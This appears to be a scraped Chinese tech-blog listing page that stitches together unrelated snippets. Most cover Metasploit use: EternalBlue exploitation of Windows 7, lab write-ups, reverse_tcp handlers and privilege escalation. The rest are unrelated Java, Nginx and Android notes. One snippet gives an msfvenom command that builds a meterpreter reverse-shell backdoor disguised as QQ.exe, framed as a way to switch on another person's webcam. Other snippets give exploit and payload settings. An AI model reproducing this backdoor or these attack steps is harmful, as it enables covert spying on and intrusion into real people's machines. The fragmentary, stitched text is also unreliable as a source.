- msf安装升级+使用
JyinP
msf背景Msfconsole:是一个一体化集中控制台,允许你访问到几乎所有的MSF框架选项metasploit就是一个免费的漏洞框架,利用他人人都是黑客,使用者不需要任何编程基础就可以使用msf没有更新1926的渗透攻击数image.png更新源命令:root@kali:~#vi/etc/apt/sources.listvi编辑器当中的使用:“i”插入添加,esc键退出,“:wq”保存并退出。编
- 【Vulnhub靶场】THALES:1
Ch33syNai1a0
靶场实战web安全安全网络安全
目录前言描述一、信息收集0x00arp-scan扫描0x01nmap扫描二、漏洞利用0x00msfconsole利用0x01文件上传三、权限提升0x00反弹shell0x02字典爆破编辑0x03user.txt0x04反弹shell0x05root.txt总结前言描述简介:睁开眼,换个角度包括2个标志:user.txt和root.txt。下载链接https://download.vulnhub.c
- kail使用msf工具利用永恒之蓝漏洞攻击win7
只喜欢打乒乓球
安全
实验环境靶机:win7IP:192.168.43.144攻击机:kaliip:192.168.43.150实验开始:第一步:打开msfconsole进入到工具里面搜索一下永恒之蓝漏洞searchms17_010这上面有三个可以利用的漏洞我们选择第一个useexploit/windows/smb/ms17_010_eternalblue接下来我们可以查看需要设置的IP地址和端口showoptions
- 红日靶场之sta&&ck远程桌面控制 个人学习)
曼达洛战士
学习
我们首先打开webshell工具然后切换到C盘的www的文件夹下面然后我们打开MSF工具进行监听模板msfconsole启动MSF工具然后是useexploit/multi/handler使用漏洞辅助模块setpayloadwindows/meterpreter/reverse_tcp这是利用漏洞tcp回弹模块setlhost192.168.52.129这是设置回弹的主机这里是我们的kali攻击机
- Kali Linux利用MSF渗透Windows11电脑
Xiao5ovo
KaliLinux攻击linux服务器
目录一、MSF简介渗透环境二、渗透流程1.KaliLinux进入Root模式2.生成可执行文件3.运行msfconsole命令4.配置参数5.在靶机Windows11打开可执行文件6.渗透一、MSF简介MsfvenomaMetasploitstandalonepayloadgenerator,Alsoareplacementformsfpayloadandmsfencode.是用来生成后门的软件。
- 永恒之蓝(ms17_010)复现
玖龍的意志
网络网络安全安全
永恒之蓝(ms17_010)复现准备工作正式复现ping使用metaspoilt中的msfconsole搜索模块使用模块查看模块设置模块设置攻击目标设置攻击载荷设置监听地址设置逻辑端口开始攻击成功了我们可以做什么远程登陆需要注意操作需要打开管理员权限,以及以上操作仅供参考不一定百分百正确准备工作虚拟机安装完成网络配置完成(注意校园网选NAT模式,学校的校园网不允许生成虚拟IP)或者使用手机热点进行
- 渗透测试:CentOS 7 环境下 MSF 工具部署(Metasploit 渗透测试框架安装)
零号·镜瞳
渗透测试镜瞳知识库centoslinuxpostgresql网络安全服务器
目录前言Metasploit介绍环境准备开始部署官网命令一键安装百度网盘资源安装postgresql数据库部署数据库安装数据库初始化验证问题处理框架升级因执行升级命令,导致工具无法使用前言本文主要介绍Metasploit渗透测试框架安装部署,可能大家对Metasploit渗透测试框架比较陌生,但是这个框架下有一个很出名的工具:msfconsole,也就是大名鼎鼎的渗透测试工具MSF。这个工具是集成
- 渗透系列:红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记
坦笑&&life
网络安全学习笔记
红日靶场(vulnstack)一超全面详细的渗透测试学习笔记一、环境搭建实验环境拓扑如下:网络配置二、拿下web服务器信息收集扫描端口和网站目录发现主机:第一个IP启用goby,扫描,可以看扫描出了永恒之蓝漏洞kali中启动msfconsole一、环境搭建实验环境拓扑如下:
- 【初学kali】--切换root用户、安装msf
网络安全之路
msflinux运维服务器
1、首次切换root时,设置信密码,输入命令:sudopasswdroot显示successfully,说明新密码设置成功2、切换root用户,命令:su-root输入新设置的密码即可,变为以下即说明成功切换到root用户3、打开msf控制台:root用户,命令:msfconsole
- MetaSploit工具的使用
失之一灵
数据库
在命令行输入:msfconsole启动msfmsfconsole另外的方式msfdbinitmsfdbrun查看数据库连接状态db_status扫描端口并存储db_nmap查看扫描到的数据信息servicesMSF常用的模式和命令搜索模块search模块名字使用模块use+编号查看模块使用showinfo查看模块参数showoptions设置参数set参数名字参数值运行脚本(发起攻击)run(ex
- MSF学习
双层小牛堡
WEB学习
之前的渗透测试中其实很少用到csmsf但是在实际内网的时候可以发现msfcs都是很好用的所以现在我来学习一下msf的使用方法kali自带msfhttps://www.cnblogs.com/bmjoker/p/10051014.html使用msfconsole启动即可首先就是最正常的木马生成所以这里其实只需要会木马生成其他免杀什么的先不需要看这里我们使用msfvenom基本木马生成msfvenom
- HTB-Analytics
Plkaciu
#HTB安全web安全
一、信息收集绑定hosts文件使用gobuster工具爆破子域名,爆出了一个地址是一个登录页面二、漏洞利用发现这个cms存在漏洞msfconsole里面有脚本拿到shell查看环境变量里面发现账号:metalytics密码:An4lytics_ds20223#连接成功三、权限提升查看系统版本号找到提权漏洞https://www.reddit.com/r/selfhosted/comments/15
- msf基础使用
longersking
工具使用安全
MSFmsfconsole常规用法终端输入msfconsole通过命令执行连接对方主机使用exploit/multi/script/web_delivery模块useexploit/multi/script/web_delivery进入模块后可以使用以下命令,进行攻击的配置showtargets#查看可选择的目标类型settarget对应编号|目标类型#设置攻击目标showpayloads#查看可
- Linux提权
config_星辰
内网渗透Linux提权
接上文Windows提权操作后,简单介绍Linux提权方法Linux和Windows一样,也有相对应的脚本进行漏洞扫描,但风险太高,容易把服务器提崩,建议不用https://github.com/InteliSecureLabs/Linux_Exploit_Suggesteruname提权使用uname-a查看内核版本,在msfconsole工具中搜索该版本所爆出的漏洞,下载payload即可比如
- Tomcat-pass-getshell 弱口令
凯凯_0523
tomcatjavaapache
名称:Tomcat-pass-getshell弱口令描述:Tomcat是Apache软件基金会(ApacheSoftwareFoundation)的Jakarta项目中的一个核心项目,由Apache、Sun和其他一些公司及个人共同开发而成。通过弱口令登录后台,部署war包geshell步骤1利用平台搭建完网站步骤2查看登录界面,利用kali系统的msfconsole进行破解启动msfconsole
- 内网win7渗透(初级)
my‘name 卢本伟
安全系统安全
攻击机kali2021.查看一下IP地址目标主机win7ipconfig查看地址:确保相互之前可以通讯开始渗透;开启kali命令行使用工具nmap工具扫描一下目标开放端口使用nmap扫描靶机查看可以利用模块(快)显示可以利用模块ms17-010打开渗透工具msfconsole调用模块ms17-010msf6>usems17-010(这是是新版kali调用命令,简便)可以看到各种模块,这里我们只用到
- 2021年中职“网络安全“江西省赛题—B-2:Linux操作系统渗透测试
acaciaf
中职网络安全linuxweb安全安全
2021年中职"网络安全"江西省赛题—B-2:Linux操作系统渗透测试B-2:Linux操作系统渗透测试B-2:Linux操作系统渗透测试任务环境说明:服务器场景:Server06服务器场景操作系统:Linux(版本不详)(关闭连接)nmap-p--sVip扫描靶机端口使用命令msfconsole打开Metasploit渗透测试平台,使用search命令搜索模块mysql暴力破解模块并进行利
- Kali 使用永恒之蓝Eternalblue攻击win7
23hours
网络渗透web安全渗透测试安全
kaliEternalbluetowin7实验准备攻击机:kali,IP:192.168.226.130靶机:win7,IP:192.168.226.128实验过程关闭win7防火墙,开放445,139端口扫描以下,查看端口情况$sudonmap-sV-A-O192.168.226.128启动msfconsole$msfconsole使用auxiliary/scanner/smb/sm
- MSF与CS之间会话传递,互相派生,版本问题踩坑
qq_29060627
数据库服务器运维网络安全安全威胁分析
查看kali版本:┌──(root㉿kali)-[~]└─#msfconsole-VFrameworkVersion:6.1.27-dev┌──(root㉿kali)-[~]└─#cat/etc/os-releasePRETTY_NAME="KaliGNU/LinuxRolling"NAME="KaliGNU/Linux"ID=kaliVERSION="2022.1"VERSION_ID="202
- Kali linux 2016.2(Rolling)中的auxiliary模块详解
weixin_33858336
数据库php运维
root@kali:~#msfconsole______________________________________________________________________________|||3KomSuperHackIILogon||___________________________________________________________________________
- 靶机 DC_1
gjl_
渗透测试chrome前端php网络安全linux安全网络
DC_1信息搜集存活检测详细扫描网页目录扫描网页信息搜集cms为Drupal漏洞利用使用msf搜索drupal的漏洞启动msfconsole搜索searchdrupal尝试编号为0的漏洞失败利用编号为1的漏洞use1查看需要配置的选项showoptions设置目标ipsetrhost10.4.7.145启动run成功建立连接获取shell权限shell回显提示符python-c'importpty
- ONE DAY |网络安全渗透测试之跨网段攻击
NeverUP.
web安全安全网络
目录一、网络安全1、什么是渗透测试?2、渗透测试的完整流程3、渗透测试方法二、实验阶段1、实验项目名称2、实验所需工具3、实验目的及要求作业要求:4、实验开始1、配置网络环境1、输入msfconsole启动metasploit目录一、网络安全1、什么是渗透测试?2、渗透测试的完整流程3、渗透测试方法二、实验阶段1、实验项目名称2、实验所需工具3、实验目的及要求作业要求:4、实验开始1、配置网络环境
- MongoDB未授权访问漏洞验证与修复过程
Swaynie
笔记mongodb数据库运维安全
环境:Windows,MongoDB3.2文章目录一、漏洞验证1.使用MSF验证2.使用nmap验证二、修复1.寻找配置文件mongod.cfg(Windows下)2.在`#networkinterfaces`下插入以下代码三、复现四、结语本文是Windows!Windows!Windows!环境下一、漏洞验证1.使用MSF验证msfconsole-------------进入msf-------
- MSF入门
你怎么睡得着的!
网络安全kalimsf
漏洞数据库、利用工具集=MSFMSF:TheMetasploitFramework简称美少妇MSF安装安装平台KaliLinux:自带Linux:阿里云CentOS7安装msfWindows.msi使用方式msfconsole交互终端msfcli.msfconsole-x"command:..."图形界面:artimate、viper下面我会用kali来给大家演示核心模块Exploits利用模块(
- Vulnhub系列靶机-Raven2
来日可期x
Vulnhub靶机网络安全系统安全vulnhub靶机udf提权
文章目录Raven2渗透测试1.信息收集1.1主机探测1.2端口扫描1.3目录爆破2.漏洞探测3.漏洞利用3.1msfconsole3.2交互式shell4.权限提升Raven2渗透测试1.信息收集1.1主机探测arp-scan-l1.2端口扫描nmap-p--A192.168.188.213通过nmap工具进行端口扫描发现靶机开放了22,80,111,58447端口。访问Web页面使用浏览器插件
- metasploit连接数据库
huachaiufo
web安全网络安全
连接数据是为了保存攻击结果打开终端输入msfconsole3.连接数据库------开启数据库4.创建数据库msf和用户msf5.用Msf连接数据库6.连接成功后工作台的相关操作
- Metasploit(一)
echokp
工具开发工具
Metasploit木马MSF模块介绍auxiliaryexploitspayloadsencodersnopspost木马管理开启监听连接多个木马木马持久化木马进程迁移生成木马生成木马木马捆绑木马混淆劫持DLL生成脚本木马设置payload(这里以python为例)配置payload生成木马快捷方式(编写脚本)生成后门木马管理在msfconsole中生成木马并监听设置payload配置paylo
- 打开对方的电脑的摄像头
落幕_f94c
大家玩玩就好,有杀毒软件可能会被干掉,关于免杀方式有很多,请勿捉弄同学,谢谢msfvenom-pwindows/meterpreter/reverse_tcpLHOST=10.0.128.149LPORT=8888-fexe-oQQ.exe---制作木马msfconsole--进入控制台msf>useexploit/multi/handler--调用模块-->目的在于设置与木马程序的通信方式和监听
- 任务146:MSF基本使用和控制台命令
FKTX
msf在使用前可以先更新一下,命令:msfupdatemsf用法和recon-ng很像,比如帮助信息help在这个msfconsole界面也是可以执行系统命令的banner就是小贴士命令connect和nc很像,可以连别人show就是展现想看的模块search可以搜索想用的模块名称,关键字也可以。也可更精确一点,比如searchname:mysql。其中想要更精确一点,就search-h查看当前的
- Kali系统MSF模块暴力破解MySQL弱口令漏洞
mooyuan天天
网络安全安全mysqlkali弱口令Metasploit
一、实验环境1.攻击方:攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具。这里要特别强调:被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306,故而一般情况下要求被攻击的服务器开启了3306端口号。2.被攻击MySQL环境:Wind
- java Illegal overloaded getter method with ambiguous type for propert的解决
zwllxs
javajdk
好久不来iteye,今天又来看看,哈哈,今天碰到在编码时,反射中会抛出
Illegal overloaded getter method with ambiguous type for propert这么个东东,从字面意思看,是反射在获取getter时迷惑了,然后回想起java在boolean值在生成getter时,分别有is和getter,也许我们的反射对象中就有is开头的方法迷惑了jdk,
- IT人应当知道的10个行业小内幕
beijingjava
工作互联网
10. 虽然IT业的薪酬比其他很多行业要好,但有公司因此视你为其“佣人”。
尽管IT人士的薪水没有互联网泡沫之前要好,但和其他行业人士比较,IT人的薪资还算好点。在接下的几十年中,科技在商业和社会发展中所占分量会一直增加,所以我们完全有理由相信,IT专业人才的需求量也不会减少。
然而,正因为IT人士的薪水普遍较高,所以有些公司认为给了你这么多钱,就把你看成是公司的“佣人”,拥有你的支配
- java 实现自定义链表
CrazyMizzz
java数据结构
1.链表结构
链表是链式的结构
2.链表的组成
链表是由头节点,中间节点和尾节点组成
节点是由两个部分组成:
1.数据域
2.引用域
3.链表的实现
&nbs
- web项目发布到服务器后图片过一会儿消失
麦田的设计者
struts2上传图片永久保存
作为一名学习了android和j2ee的程序员,我们必须要意识到,客服端和服务器端的交互是很有必要的,比如你用eclipse写了一个web工程,并且发布到了服务器(tomcat)上,这时你在webapps目录下看到了你发布的web工程,你可以打开电脑的浏览器输入http://localhost:8080/工程/路径访问里面的资源。但是,有时你会突然的发现之前用struts2上传的图片
- CodeIgniter框架Cart类 name 不能设置中文的解决方法
IT独行者
CodeIgniterCart框架
今天试用了一下CodeIgniter的Cart类时遇到了个小问题,发现当name的值为中文时,就写入不了session。在这里特别提醒一下。 在CI手册里也有说明,如下:
$data = array(
'id' => 'sku_123ABC',
'qty' => 1,
'
- linux回收站
_wy_
linux回收站
今天一不小心在ubuntu下把一个文件移动到了回收站,我并不想删,手误了。我急忙到Nautilus下的回收站中准备恢复它,但是里面居然什么都没有。 后来我发现这是由于我删文件的地方不在HOME所在的分区,而是在另一个独立的Linux分区下,这是我专门用于开发的分区。而我删除的东东在分区根目录下的.Trash-1000/file目录下,相关的删除信息(删除时间和文件所在
- jquery回到页面顶端
知了ing
htmljquerycss
html代码:
<h1 id="anchor">页面标题</h1>
<div id="container">页面内容</div>
<p><a href="#anchor" class="topLink">回到顶端</a><
- B树、B-树、B+树、B*树
矮蛋蛋
B树
原文地址:
http://www.cnblogs.com/oldhorse/archive/2009/11/16/1604009.html
B树
即二叉搜索树:
1.所有非叶子结点至多拥有两个儿子(Left和Right);
&nb
- 数据库连接池
alafqq
数据库连接池
http://www.cnblogs.com/xdp-gacl/p/4002804.html
@Anthor:孤傲苍狼
数据库连接池
用MySQLv5版本的数据库驱动没有问题,使用MySQLv6和Oracle的数据库驱动时候报如下错误:
java.lang.ClassCastException: $Proxy0 cannot be cast to java.sql.Connec
- java泛型
百合不是茶
java泛型
泛型
在Java SE 1.5之前,没有泛型的情况的下,通过对类型Object的引用来实现参数的“任意化”,任意化的缺点就是要实行强制转换,这种强制转换可能会带来不安全的隐患
泛型的特点:消除强制转换 确保类型安全 向后兼容
简单泛型的定义:
泛型:就是在类中将其模糊化,在创建对象的时候再具体定义
class fan
- javascript闭包[两个小测试例子]
bijian1013
JavaScriptJavaScript
一.程序一
<script>
var name = "The Window";
var Object_a = {
name : "My Object",
getNameFunc : function(){
var that = this;
return function(){
- 探索JUnit4扩展:假设机制(Assumption)
bijian1013
javaAssumptionJUnit单元测试
一.假设机制(Assumption)概述 理想情况下,写测试用例的开发人员可以明确的知道所有导致他们所写的测试用例不通过的地方,但是有的时候,这些导致测试用例不通过的地方并不是很容易的被发现,可能隐藏得很深,从而导致开发人员在写测试用例时很难预测到这些因素,而且往往这些因素并不是开发人员当初设计测试用例时真正目的,
- 【Gson四】范型POJO的反序列化
bit1129
POJO
在下面这个例子中,POJO(Data类)是一个范型类,在Tests中,指定范型类为PieceData,POJO初始化完成后,通过
String str = new Gson().toJson(data);
得到范型化的POJO序列化得到的JSON串,然后将这个JSON串反序列化为POJO
import com.google.gson.Gson;
import java.
- 【Spark八十五】Spark Streaming分析结果落地到MySQL
bit1129
Stream
几点总结:
1. DStream.foreachRDD是一个Output Operation,类似于RDD的action,会触发Job的提交。DStream.foreachRDD是数据落地很常用的方法
2. 获取MySQL Connection的操作应该放在foreachRDD的参数(是一个RDD[T]=>Unit的函数类型),这样,当foreachRDD方法在每个Worker上执行时,
- NGINX + LUA实现复杂的控制
ronin47
nginx lua
安装lua_nginx_module 模块
lua_nginx_module 可以一步步的安装,也可以直接用淘宝的OpenResty
Centos和debian的安装就简单了。。
这里说下freebsd的安装:
fetch http://www.lua.org/ftp/lua-5.1.4.tar.gz
tar zxvf lua-5.1.4.tar.gz
cd lua-5.1.4
ma
- java-递归判断数组是否升序
bylijinnan
java
public class IsAccendListRecursive {
/*递归判断数组是否升序
* if a Integer array is ascending,return true
* use recursion
*/
public static void main(String[] args){
IsAccendListRecursiv
- Netty源码学习-DefaultChannelPipeline2
bylijinnan
javanetty
Netty3的API
http://docs.jboss.org/netty/3.2/api/org/jboss/netty/channel/ChannelPipeline.html
里面提到ChannelPipeline的一个“pitfall”:
如果ChannelPipeline只有一个handler(假设为handlerA)且希望用另一handler(假设为handlerB)
来
- Java工具之JPS
chinrui
java
JPS使用
熟悉Linux的朋友们都知道,Linux下有一个常用的命令叫做ps(Process Status),是用来查看Linux环境下进程信息的。同样的,在Java Virtual Machine里面也提供了类似的工具供广大Java开发人员使用,它就是jps(Java Process Status),它可以用来
- window.print分页打印
ctrain
window
function init() {
var tt = document.getElementById("tt");
var childNodes = tt.childNodes[0].childNodes;
var level = 0;
for (var i = 0; i < childNodes.length; i++) {
- 安装hadoop时 执行jps命令Error occurred during initialization of VM
daizj
jdkhadoopjps
在安装hadoop时,执行JPS出现下面错误
[slave16]
[email protected]:/tmp/hsperfdata_hdfs# jps
Error occurred during initialization of VM
java.lang.Error: Properties init: Could not determine current working
- PHP开发大型项目的一点经验
dcj3sjt126com
PHP重构
一、变量 最好是把所有的变量存储在一个数组中,这样在程序的开发中可以带来很多的方便,特别是当程序很大的时候。变量的命名就当适合自己的习惯,不管是用拼音还是英语,至少应当有一定的意义,以便适合记忆。变量的命名尽量规范化,不要与PHP中的关键字相冲突。 二、函数 PHP自带了很多函数,这给我们程序的编写带来了很多的方便。当然,在大型程序中我们往往自己要定义许多个函数,几十
- android笔记之--向网络发送GET/POST请求参数
dcj3sjt126com
android
使用GET方法发送请求
private static boolean sendGETRequest (String path,
Map<String, String> params) throws Exception{
//发送地http://192.168.100.91:8080/videoServi
- linux复习笔记 之bash shell (3) 通配符
eksliang
linux 通配符linux通配符
转载请出自出处:
http://eksliang.iteye.com/blog/2104387
在bash的操作环境中有一个非常有用的功能,那就是通配符。
下面列出一些常用的通配符,如下表所示 符号 意义 * 万用字符,代表0个到无穷个任意字符 ? 万用字符,代表一定有一个任意字符 [] 代表一定有一个在中括号内的字符。例如:[abcd]代表一定有一个字符,可能是a、b、c
- Android关于短信加密
gqdy365
android
关于Android短信加密功能,我初步了解的如下(只在Android应用层试验):
1、因为Android有短信收发接口,可以调用接口完成短信收发;
发送过程:APP(基于短信应用修改)接受用户输入号码、内容——>APP对短信内容加密——>调用短信发送方法Sm
- asp.net在网站根目录下创建文件夹
hvt
.netC#hovertreeasp.netWeb Forms
假设要在asp.net网站的根目录下建立文件夹hovertree,C#代码如下:
string m_keleyiFolderName = Server.MapPath("/hovertree");
if (Directory.Exists(m_keleyiFolderName))
{
//文件夹已经存在
return;
}
else
{
try
{
D
- 一个合格的程序员应该读过哪些书
justjavac
程序员书籍
编者按:2008年8月4日,StackOverflow 网友 Bert F 发帖提问:哪本最具影响力的书,是每个程序员都应该读的?
“如果能时光倒流,回到过去,作为一个开发人员,你可以告诉自己在职业生涯初期应该读一本, 你会选择哪本书呢?我希望这个书单列表内容丰富,可以涵盖很多东西。”
很多程序员响应,他们在推荐时也写下自己的评语。 以前就有国内网友介绍这个程序员书单,不过都是推荐数
- 单实例实践
跑龙套_az
单例
1、内部类
public class Singleton {
private static class SingletonHolder {
public static Singleton singleton = new Singleton();
}
public Singleton getRes
- PO VO BEAN 理解
q137681467
VODTOpo
PO:
全称是 persistant object持久对象 最形象的理解就是一个PO就是数据库中的一条记录。 好处是可以把一条记录作为一个对象处理,可以方便的转为其它对象。
BO:
全称是 business object:业务对象 主要作用是把业务逻辑封装为一个对象。这个对
- 战胜惰性,暗自努力
金笛子
努力
偶然看到一句很贴近生活的话:“别人都在你看不到的地方暗自努力,在你看得到的地方,他们也和你一样显得吊儿郎当,和你一样会抱怨,而只有你自己相信这些都是真的,最后也只有你一人继续不思进取。”很多句子总在不经意中就会戳中一部分人的软肋,我想我们每个人的周围总是有那么些表现得“吊儿郎当”的存在,是否你就真的相信他们如此不思进取,而开始放松了对自己的要求随波逐流呢?
我有个朋友是搞技术的,平时嘻嘻哈哈,以
- NDK/JNI二维数组多维数组传递
wenzongliang
二维数组jniNDK
多维数组和对象数组一样处理,例如二维数组里的每个元素还是一个数组 用jArray表示,直到数组变为一维的,且里面元素为基本类型,去获得一维数组指针。给大家提供个例子。已经测试通过。
Java_cn_wzl_FiveChessView_checkWin( JNIEnv* env,jobject thiz,jobjectArray qizidata)
{
jint i,j;
int s